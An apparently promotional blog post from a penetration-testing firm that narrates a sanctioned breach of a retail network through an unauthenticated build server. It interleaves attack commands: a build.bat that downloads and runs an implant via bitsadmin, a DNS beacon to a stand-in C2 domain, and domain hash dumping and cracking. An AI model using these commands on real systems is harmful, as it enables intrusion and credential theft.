The Truth About Breaching Retail Networks

How we breached a retail network using our manual penetration testing methodology

We recently delivered an Advanced Persistent Threat (APT) Penetration Test to one of our customers. People who know us know that when we say APT we're not just using buzzwords. Our APT services maintain a 98% success rate at compromise, while our unrestricted methodology maintains a 100% success rate at compromise to date. (In fact, we offer a challenge to back up our stats: if we don't penetrate with our unrestricted methodology, then your test is free.) Let's begin the story about a large retail customer that wanted our APT services.
When we deliver covert engagements we don't use the everyday and largely ineffective low-and-slow methodology. Instead, we use a realistic offensive methodology that incorporates distributed scanning, custom tools, and zero-day malware (RADON), among other things. We call this methodology Real Time Dynamic Testing™ because it's delivered in real time and is dynamic. At the core of our methodology are components normally reserved for vulnerability research and exploit development. Needless to say, our methodology has teeth.
Our customer (the target) wanted a single /23 attacked during the engagement. The first thing we did was perform reconnaissance against the /23 so that we knew what we were up against. Reconnaissance in this case involved distributed scanning and revealed a large number of HTTP and HTTPS services running on 149 live targets. The majority of the pages were uninteresting and served static content, while a few served dynamic content.
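Our distributed scanning framework is proprietary, so we won't reproduce it here, but the basic discovery step is easy to approximate with nmap. The 203.0.113.0/23 range below is a documentation placeholder, not the customer's network:

# Sweep the /23 for live web services.
# -sS: SYN scan (requires root); --open: only report open ports.
nmap -sS -p 80,443,8080,8443 --open -oA websweep 203.0.113.0/23

# Grab page titles from responders to help separate static pages from dynamic applications.
nmap -p 80,443 --open --script http-title 203.0.113.0/23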
While evaluating the dynamic pages we came across one called Make Boss. The application appeared to be custom-built for the purpose of managing software builds. What really snagged our attention was that this application didn't support any sort of authentication. Instead, anyone who visited the page could use the application.
We quickly noticed that the application allowed us to create new projects. Then we noticed that we could point those new projects at any SVN or Git repository, local or remote. We also identified a hidden, questionable page named "list-dir.php" that enabled us to list the contents of any directory that the web server had permission to access.
We used "list-dir.php" to enumerate local users by guessing the contents of "C:\docume~1" (the Documents and Settings folder). In doing so we identified useful directories like "C:\MakeBoss\Source" and "C:\MakeBoss\Compiled". The existence of these directories told us that projects were built on and fetched from the same server.
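To illustrate what that abuse looked like, the requests below approximate it with curl. The "dir" parameter name and the target.example hostname are hypothetical; the real page parameters and host are redacted:

# Hypothetical reconstruction: the "dir" parameter and hostname are invented.
# The page returned a listing for any directory the web server account could read.
curl 'http://target.example/list-dir.php?dir=C:\docume~1'
curl 'http://target.example/list-dir.php?dir=C:\MakeBoss'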
The next step was to see if we could in fact get the Make Boss application to establish a connection with a repository that we controlled. To do this we set up an external listener using netcat in our lab. Then we configured a new project called "_Netragard" in Make Boss in such a way that it would connect to our listener. The test was a success, as shown by the redacted output below.

[titon@netragard:~]$ nc -l -p 8888 -v
listening on [any] 8888 …
xx.xx.xx.xx: inverse host lookup failed: Unknown server error : Connection timed out
connect to [xx.xx.xx.xx] from (UNKNOWN) [xx.xx.xx.xx] 1028
OPTIONS / HTTP/1.1
Host: lab1.netragard.com:8888
User-Agent: SVN/1.6.4 (r38063) neon/0.28.2
Keep-Alive:
Connection: TE, Keep-Alive
TE: trailers
Content-Type: text/xml
Accept-Encoding: gzip
DAV: https://subversion.tigris.org/xmlns/dav/svn/depth
DAV: https://subversion.tigris.org/xmlns/dav/svn/mergeinfo
DAV: https://subversion.tigris.org/xmlns/dav/svn/log-revprops
Content-Length: 104
Accept-Encoding: gzip
 
<?xml version="1.0" encoding="utf-8"?><D:options xmlns:D="DAV:"><D:activity-collection-set/></D:options>

With communications verified, we set up a real instance of SVN and created a weaponized build.bat file. We selected build.bat because we knew that Make Boss would execute it server-side, and, if done right, we could use it to infect the system. (A good reference for setting up Subversion can be found here: https://subversion.apache.org/quick-start). Our initial attempts at getting execution failed due to file system permissions. We managed to get successful execution of our build.bat by changing our target directory to "C:\TEMP" rather than working from the standard web server directories.
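For readers who want to reproduce the setup, standing up a minimal repository takes only a few commands (paths below are illustrative). Note that on the engagement Make Boss reached our repository over HTTP/DAV, which requires Apache with mod_dav_svn; svnserve, shown here, is simply the quickest way to get a network-reachable repository:

# Create a repository and import the build script into it.
svnadmin create /var/svn/makeboss-poc
svn import build.bat file:///var/svn/makeboss-poc/build.bat -m "initial import"

# Serve the repository so that Make Boss can fetch from it (svn:// on port 3690).
svnserve -d -r /var/svn --listen-port 3690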
With execution capabilities verified, we modified our build.bat file so that it would deploy RADON (our home-grown 0-day pseudo-malware). We used Make Boss to fetch and run our weaponized build.bat, which in turn infected the server running the Make Boss application. Within seconds of infection, our Command & Control server received a connection from the Make Boss server. This represented our first point of penetration.
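RADON and its dropper are proprietary, so the script below is a purely hypothetical stand-in that shows the shape of a weaponized build file; the payload name, URL, and staging path are invented for illustration:

# Hypothetical stand-in for the weaponized build.bat (payload URL and paths invented).
cat > build.bat <<'EOF'
@echo off
rem Stage an implant somewhere the build user can write, then launch it quietly.
bitsadmin /transfer pull /download /priority normal http://lab1.netragard.com/r.exe C:\TEMP\r.exe
start /b C:\TEMP\r.exe
EOF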
A note about RADON…
RADON is "safe" as far as malware goes because each strand is built with a pre-defined expiration date. During this engagement RADON was set to expire 5 days after strand generation. When RADON expires it quietly and cleanly self-destructs, leaving the infected system in its original state, which is more than can be said for other "whitehat" frameworks (like Metasploit, etc.).
RADON is also unique in that it's designed for our highest-threat engagements (nation-state style). By design, RADON will communicate over both known and unknown covert channels. Known channels are used for normal operation while covert channels are used for more specialized engagements. All variants of RADON can be switched from known to covert and vice versa from the Command & Control server.
Finally, it’s almost impossible to disrupt communication between RADON and its Command & Control center.  This is in part because of the way that RADON leverages key protocols that all networks depend on to operate.  Because of this, disrupting RADON’s covert channels would also disrupt all network functionality.
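We won't document RADON's actual channels, but DNS is the classic example of a protocol that can't be blocked without breaking the network. A deliberately crude sketch of the idea follows; c2.example.com is an invented attacker-controlled domain, not anything RADON uses:

# Encode a short identifier and smuggle it out inside a DNS lookup.
# Blocking lookups like this outright means breaking name resolution itself.
id=$(hostname | xxd -p)
dig +short "${id}.beacon.c2.example.com" A > /dev/null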
Back to the hack…
With the system infected by RADON, we were able to take administrative control of the Make Boss server. From there we identified domain administrator credentials that the server was happy to relinquish. We used those credentials to authenticate to the domain controller and extract all current and historical password hashes. Then we used one of our specialized GPU password-cracking machines to process the hashes and deliver us the keys to the kingdom.
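Our in-house tooling stays in-house, but the equivalent steps are easy to picture with today's public tools (the domain, credentials, host, and file names below are illustrative):

# Dump NTDS.dit secrets from the domain controller, including password history.
impacket-secretsdump -just-dc -history 'CORP/admin:Password1@dc01.corp.example'

# Crack the recovered NTLM hashes (hashcat mode 1000) on a GPU rig.
hashcat -m 1000 -a 0 hashes.ntlm wordlist.txt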
With that accomplished, we had established dominant network position. From this position we were able to propagate RADON to all endpoints and effect an irrecoverable network compromise. Irrecoverable if we were the bad guys, of course; luckily we're the good guys and our customer recovered just fine. Nevertheless, we had access to everything, including but not limited to desktops, point-of-sale systems, web servers, databases, network devices, etc.
Not surprisingly, our customer's managed security service provider didn't detect any of our activity, not even the mass infection. They did, however, detect what we did next…
As a last step, and to satisfy our customer, we ran two different popular vulnerability scanners. These are the same scanners that most penetration testing vendors rely on to deliver their services. One of the scanners is more network-centric while the other combines network and web application scanning. Neither scanner identified a single viable vulnerability, despite the existence of the (blatantly obvious) one that we exploited above. The only things reported were informational findings like "port 80 open", "deprecated SSL", etc.
It's really important to consider this when thinking about the breaches suffered by businesses like Hannaford, Sony, Target, Home Depot and so many others. If the penetration tests that you receive are based on the output of vulnerability scanners, and those scanners fail to detect the most obvious vulnerabilities, then where does that leave you? Don't be fooled by testers who promise to deliver "manual penetration tests" either. In most cases they just vet scan reports and call the process of vetting "manual testing", which it isn't.
